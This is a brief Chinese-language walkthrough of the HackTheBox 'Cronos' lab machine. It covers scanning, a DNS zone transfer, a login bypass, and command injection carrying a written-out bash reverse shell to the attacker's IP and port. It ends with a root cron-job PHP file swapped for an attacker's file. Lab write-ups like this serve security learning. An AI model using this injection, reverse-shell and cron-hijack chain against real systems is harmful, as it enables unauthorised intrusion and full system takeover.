Cronos - HackTheBox

nmap扫描

先看看80端口

扫一下目录

啥也没有

枚举一下解析域名 dig -x 10.10.10.13 @10.10.10.13

添加hosts解析

没找到可利用信息，继续枚举子域名 dig axfr cronos.htb @10.10.10.13

发现admin.cronos.htb，www.cronos.htb，添加至hosts文件

发现一个登录框，尝试弱口令

尝试万能密码

又是经典ssrf，直接弹个shell，127.0.0.1&/bin/bash -c "bash -i >& /dev/tcp/10.10.14.5/7777 0>&1"

提权

在看下计划任务

发现一个每分钟以root权限执行的php文件，查看有无权限读写

直接替换文件内容，在本地攻击机写好php文件

利用python开启http服务，让靶机下载

先备份一下源文件

攻击机监听